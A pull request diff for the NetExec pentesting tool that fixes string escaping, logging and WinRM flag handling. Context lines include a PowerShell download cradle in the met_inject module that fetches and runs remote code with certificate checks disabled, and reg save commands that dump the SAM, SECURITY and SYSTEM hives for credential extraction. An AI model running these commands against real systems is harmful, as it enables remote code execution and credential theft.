### PR TITLE
Fix string escaping issues for Kali package, fix some logging, and allow for lsa and sam WinRM dumping

### DIFF
--- a/nxc/cli.py
+++ b/nxc/cli.py
@@ -17,11 +17,11 @@ def gen_cli_args():
     VERSION = importlib.metadata.version("netexec")
     CODENAME = "nxc4u"
 
-    parser = argparse.ArgumentParser(description=f"""
+    parser = argparse.ArgumentParser(description=rf"""
      .   .
     .|   |.     _   _          _     _____
     ||   ||    | \ | |   ___  | |_  | ____| __  __   ___    ___
-    \\\( )//    |  \| |  / _ \ | __| |  _|   \ \/ /  / _ \  / __|
+    \\( )//    |  \| |  / _ \ | __| |  _|   \ \/ /  / _ \  / __|
     .=[ ]=.    | |\  | |  __/ | |_  | |___   >  <  |  __/ | (__
    / /ॱ-ॱ\ \   |_| \_|  \___|  \__| |_____| /_/\_\  \___|  \___|
    ॱ \   / ॱ

--- a/nxc/modules/daclread.py
+++ b/nxc/modules/daclread.py
@@ -65,7 +65,7 @@ WELL_KNOWN_SIDS = {
     "S-1-5-64-14": "SChannel Authentication",
     "S-1-5-64-21": "Digest Authority",
     "S-1-5-80": "NT Service",
-    "S-1-5-83-0": "NT VIRTUAL MACHINE\Virtual Machines",
+    "S-1-5-83-0": "NT VIRTUAL MACHINE\\Virtual Machines",
     "S-1-16-0": "Untrusted Mandatory Level",
     "S-1-16-4096": "Low Mandatory Level",
     "S-1-16-8192": "Medium Mandatory Level",
@@ -74,24 +74,24 @@ WELL_KNOWN_SIDS = {
     "S-1-16-16384": "System Mandatory Level",
     "S-1-16-20480": "Protected Process Mandatory Level",
     "S-1-16-28672": "Secure Process Mandatory Level",
-    "S-1-5-32-554": "BUILTIN\Pre-Windows 2000 Compatible Access",
-    "S-1-5-32-555": "BUILTIN\Remote Desktop Users",
-    "S-1-5-32-557": "BUILTIN\Incoming Forest Trust Builders",
+    "S-1-5-32-554": "BUILTIN\\Pre-Windows 2000 Compatible Access",
+    "S-1-5-32-555": "BUILTIN\\Remote Desktop Users",
+    "S-1-5-32-557": "BUILTIN\\Incoming Forest Trust Builders",
     "S-1-5-32-556": "BUILTIN\\Network Configuration Operators",
-    "S-1-5-32-558": "BUILTIN\Performance Monitor Users",
-    "S-1-5-32-559": "BUILTIN\Performance Log Users",
-    "S-1-5-32-560": "BUILTIN\Windows Authorization Access Group",
-    "S-1-5-32-561": "BUILTIN\Terminal Server License Servers",
-    "S-1-5-32-562": "BUILTIN\Distributed COM Users",
-    "S-1-5-32-569": "BUILTIN\Cryptographic Operators",
-    "S-1-5-32-573": "BUILTIN\Event Log Readers",
-    "S-1-5-32-574": "BUILTIN\Certificate Service DCOM Access",
-    "S-1-5-32-575": "BUILTIN\RDS Remote Access Servers",
-    "S-1-5-32-576": "BUILTIN\RDS Endpoint Servers",
-    "S-1-5-32-577": "BUILTIN\RDS Management Servers",
-    "S-1-5-32-578": "BUILTIN\Hyper-V Administrators",
-    "S-1-5-32-579": "BUILTIN\Access Control Assistance Operators",
-    "S-1-5-32-580": "BUILTIN\Remote Management Users",
+    "S-1-5-32-558": "BUILTIN\\Performance Monitor Users",
+    "S-1-5-32-559": "BUILTIN\\Performance Log Users",
+    "S-1-5-32-560": "BUILTIN\\Windows Authorization Access Group",
+    "S-1-5-32-561": "BUILTIN\\Terminal Server License Servers",
+    "S-1-5-32-562": "BUILTIN\\Distributed COM Users",
+    "S-1-5-32-569": "BUILTIN\\Cryptographic Operators",
+    "S-1-5-32-573": "BUILTIN\\Event Log Readers",
+    "S-1-5-32-574": "BUILTIN\\Certificate Service DCOM Access",
+    "S-1-5-32-575": "BUILTIN\\RDS Remote Access Servers",
+    "S-1-5-32-576": "BUILTIN\\RDS Endpoint Servers",
+    "S-1-5-32-577": "BUILTIN\\RDS Management Servers",
+    "S-1-5-32-578": "BUILTIN\\Hyper-V Administrators",
+    "S-1-5-32-579": "BUILTIN\\Access Control Assistance Operators",
+    "S-1-5-32-580": "BUILTIN\\Remote Management Users",
 }
 
 
@@ -516,6 +516,8 @@ class NXCModule:
         # If a principal has been specified, only the ACE where he is the trustee will be printed
         for parsed_ace in parsed_dacl:
             print_ace = True
+            context.log.debug(f"{parsed_ace=}, {self.rights=}, {self.rights_guid=}, {self.ace_type=}, {self.principal_sid=}")
+
             # Filter on specific rights
             if self.rights is not None:
                 try:
@@ -528,7 +530,7 @@ class NXCModule:
                     if (self.rights == "ResetPassword") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.ResetPassword.value not in parsed_ace["Object type (GUID)"])):
                         print_ace = False
                 except Exception as e:
-                    context.log.fail(f"Error filtering ACE, probably because of ACE type unsupported for parsing yet ({e})")
+                    context.log.debug(f"Error filtering with {parsed_ace=} and {self.rights=}, probably because of ACE type unsupported for parsing yet ({e})")
 
             # Filter on specific right GUID
             if self.rights_guid is not None:
@@ -536,7 +538,7 @@ class NXCModule:
                     if ("Object type (GUID)" not in parsed_ace) or (self.rights_guid not in parsed_ace["Object type (GUID)"]):
                         print_ace = False
                 except Exception as e:
-                    context.log.fail(f"Error filtering ACE, probably because of ACE type unsupported for parsing yet ({e})")
+                    context.log.debug(f"Error filtering with {parsed_ace=} and {self.rights_guid=}, probably because of ACE type unsupported for parsing yet ({e})")
 
             # Filter on ACE type
             if self.ace_type == "allowed":
@@ -544,13 +546,13 @@ class NXCModule:
                     if ("ACCESS_ALLOWED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_ALLOWED_ACE" not in parsed_ace["ACE Type"]):
                         print_ace = False
                 except Exception as e:
-                    context.log.fail(f"Error filtering ACE, probably because of ACE type unsupported for parsing yet ({e})")
+                    context.log.debug(f"Error filtering with {parsed_ace=} and {self.ace_type=}, probably because of ACE type unsupported for parsing yet ({e})")
             else:
                 try:
                     if ("ACCESS_DENIED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_DENIED_ACE" not in parsed_ace["ACE Type"]):
                         print_ace = False
                 except Exception as e:
-                    context.log.fail(f"Error filtering ACE, probably because of ACE type unsupported for parsing yet ({e})")
+                    context.log.debug(f"Error filtering with {parsed_ace=} and {self.ace_type=}, probably because of ACE type unsupported for parsing yet ({e})")
 
             # Filter on trusted principal
             if self.principal_sid is not None:
@@ -558,7 +560,7 @@ class NXCModule:
                     if self.principal_sid not in parsed_ace["Trustee (SID)"]:
                         print_ace = False
                 except Exception as e:
-                    context.log.fail(f"Error filtering ACE, probably because of ACE type unsupported for parsing yet ({e})")
+                    context.log.debug(f"Error filtering with {parsed_ace=} and {self.principal_sid=}, probably because of ACE type unsupported for parsing yet ({e})")
             if print_ace:
                 self.context.log.highlight("%-28s" % "ACE[%d] info" % i)
                 self.print_parsed_ace(parsed_ace)

--- a/nxc/modules/get-desc-users.py
+++ b/nxc/modules/get-desc-users.py
@@ -31,7 +31,7 @@ class NXCModule:
             self.MINLENGTH = module_options["MINLENGTH"]
         if "PASSWORDPOLICY" in module_options:
             self.PASSWORDPOLICY = True
-            self.regex = re.compile("((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}")  # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following
+            self.regex = re.compile(r"((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}")  # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following
 
     def on_login(self, context, connection):
         """Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""

--- a/nxc/modules/masky.py
+++ b/nxc/modules/masky.py
@@ -37,7 +37,7 @@ class NXCModule:
 
     def on_admin_login(self, context, connection):
         if not self.ca:
-            context.log.fail("Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)")
+            context.log.fail(r"Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)")
             return False
 
         host = connection.host

--- a/nxc/modules/met_inject.py
+++ b/nxc/modules/met_inject.py
@@ -56,7 +56,7 @@ class NXCModule:
         # stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload
         command = """$url="{}://{}:{}/{}"
         $DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
-        $PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\powershell.exe'
+        $PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
         if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
         $ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
         $ProcessInfo.FileName=$PowershellExe

--- a/nxc/modules/ms17-010.py
+++ b/nxc/modules/ms17-010.py
@@ -248,7 +248,7 @@ class NXCModule:
         ]
 
         # Create the IPC string
-        ipc = f"\\\\{ip}\IPC$\x00"
+        ipc = f"\\\\{ip}\\IPC$\x00"
         self.logger.debug(f"Connecting to {ip} with UID: {userid.hex()}")
 
         # Initialize the tree connect andx request

--- a/nxc/modules/runasppl.py
+++ b/nxc/modules/runasppl.py
@@ -14,8 +14,8 @@ class NXCModule:
         """"""
 
     def on_admin_login(self, context, connection):
-        command = "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL"
-        context.log.display("Executing command")
+        command = r"reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL"
+        context.log.debug(f"Executing command: {command}")
         p = connection.execute(command, True)
         if "The system was unable to find the specified registry key or value" in p:
             context.log.debug("Unable to find RunAsPPL Registry Key")

--- a/nxc/modules/wcc.py
+++ b/nxc/modules/wcc.py
@@ -194,7 +194,7 @@ class HostChecker:
             ConfigCheck("BitLocker configuration", "Checks the BitLocker configuration (based on https://www.stigviewer.com/stig/windows_10/2020-06-15/finding/V-94859)", checker_args=[[self, ("HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE", "UseAdvancedStartup", 1), ("HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE", "UseTPMPIN", 1)]]),
             ConfigCheck("Guest account disabled", "Checks if the guest account is disabled", checkers=[self.check_guest_account_disabled]),
             ConfigCheck("Automatic session lock enabled", "Checks if the session is automatically locked on after a period of inactivity", checker_args=[[self, ("HKCU\\Control Panel\\Desktop", "ScreenSaverIsSecure", 1), ("HKCU\\Control Panel\\Desktop", "ScreenSaveTimeOut", 300, le)]]),
-            ConfigCheck('Powershell Execution Policy == "Restricted"', 'Checks if the Powershell execution policy is set to "Restricted"', checker_args=[[self, ("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\ShellIds\Microsoft.Powershell", "ExecutionPolicy", "Restricted\x00"), ("HKCU\\SOFTWARE\\Microsoft\\PowerShell\\1\ShellIds\Microsoft.Powershell", "ExecutionPolicy", "Restricted\x00")]], checker_kwargs=[{"options": {"KOIfMissing": False, "lastWins": True}}])
+            ConfigCheck('Powershell Execution Policy == "Restricted"', 'Checks if the Powershell execution policy is set to "Restricted"', checker_args=[[self, ("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.Powershell", "ExecutionPolicy", "Restricted\x00"), ("HKCU\\SOFTWARE\\Microsoft\\PowerShell\\1\ShellIds\Microsoft.Powershell", "ExecutionPolicy", "Restricted\x00")]], checker_kwargs=[{"options": {"KOIfMissing": False, "lastWins": True}}])
         ]
 
         # Add check to conf_checks table if missing

--- a/nxc/protocols/smb/samrfunc.py
+++ b/nxc/protocols/smb/samrfunc.py
@@ -115,7 +115,7 @@ class SAMRQuery:
         self.server_handle = self.get_server_handle()
 
     def get_transport(self):
-        string_binding = f"ncacn_np:{self.__port}[\pipe\samr]"
+        string_binding = rf"ncacn_np:{self.__port}[\pipe\samr]"
         nxc_logger.debug(f"Binding to {string_binding}")
         # using a direct SMBTransport instead of DCERPCTransportFactory since we need the filename to be '\samr'
         return transport.SMBTransport(

--- a/nxc/protocols/winrm.py
+++ b/nxc/protocols/winrm.py
@@ -260,7 +260,7 @@ class winrm(connection):
     def sam(self):
         sam_storename = gen_random_string(6)
         system_storename = gen_random_string(6)
-        dump_command = f"reg save HKLM\SAM C:\\windows\\temp\\{sam_storename} && reg save HKLM\SYSTEM C:\\windows\\temp\\{system_storename}"
+        dump_command = f"reg save HKLM\\SAM C:\\windows\\temp\\{sam_storename} && reg save HKLM\\SYSTEM C:\\windows\\temp\\{system_storename}"
         clean_command = f"del C:\\windows\\temp\\{sam_storename} && del C:\\windows\\temp\\{system_storename}"
         try:
             self.conn.execute_cmd(dump_command) if self.args.dump_method == "cmd" else self.conn.execute_ps(f"cmd /c '{dump_command}'")
@@ -289,7 +289,7 @@ class winrm(connection):
     def lsa(self):
         security_storename = gen_random_string(6)
         system_storename = gen_random_string(6)
-        dump_command = f"reg save HKLM\SECURITY C:\\windows\\temp\\{security_storename} && reg save HKLM\SYSTEM C:\\windows\\temp\\{system_storename}"
+        dump_command = f"reg save HKLM\\SECURITY C:\\windows\\temp\\{security_storename} && reg save HKLM\\SYSTEM C:\\windows\\temp\\{system_storename}"
         clean_command = f"del C:\\windows\\temp\\{security_storename} && del C:\\windows\\temp\\{system_storename}"
         try:
             self.conn.execute_cmd(dump_command) if self.args.dump_method == "cmd" else self.conn.execute_ps(f"cmd /c '{dump_command}'")

--- a/nxc/protocols/winrm/proto_args.py
+++ b/nxc/protocols/winrm/proto_args.py
@@ -13,9 +13,8 @@ def proto_args(parser, std_parser, module_parser):
 
     cgroup = winrm_parser.add_argument_group("Credential Gathering", "Options for gathering credentials")
     cgroup.add_argument("--dump-method", action="store", default="cmd", choices={"cmd", "powershell"}, help="Select shell type in hashes dump")
-    cegroup = cgroup.add_mutually_exclusive_group()
-    cegroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems")
-    cegroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
+    cgroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems")
+    cgroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
 
     cgroup = winrm_parser.add_argument_group("Command Execution", "Options for executing commands")
     cgroup.add_argument("--codec", default="utf-8", help="Set encoding used (codec) from the target's output (default: utf-8). If errors are detected, run chcp.com at the target & map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute again with --codec and the corresponding codec")


### PR DESCRIPTION
- Fix string escaping issues for #200 
- Allow for WinRM to use both `--lsa` and `--sam`, which was already fixed for SMB
- Improve some logging locations for future debugging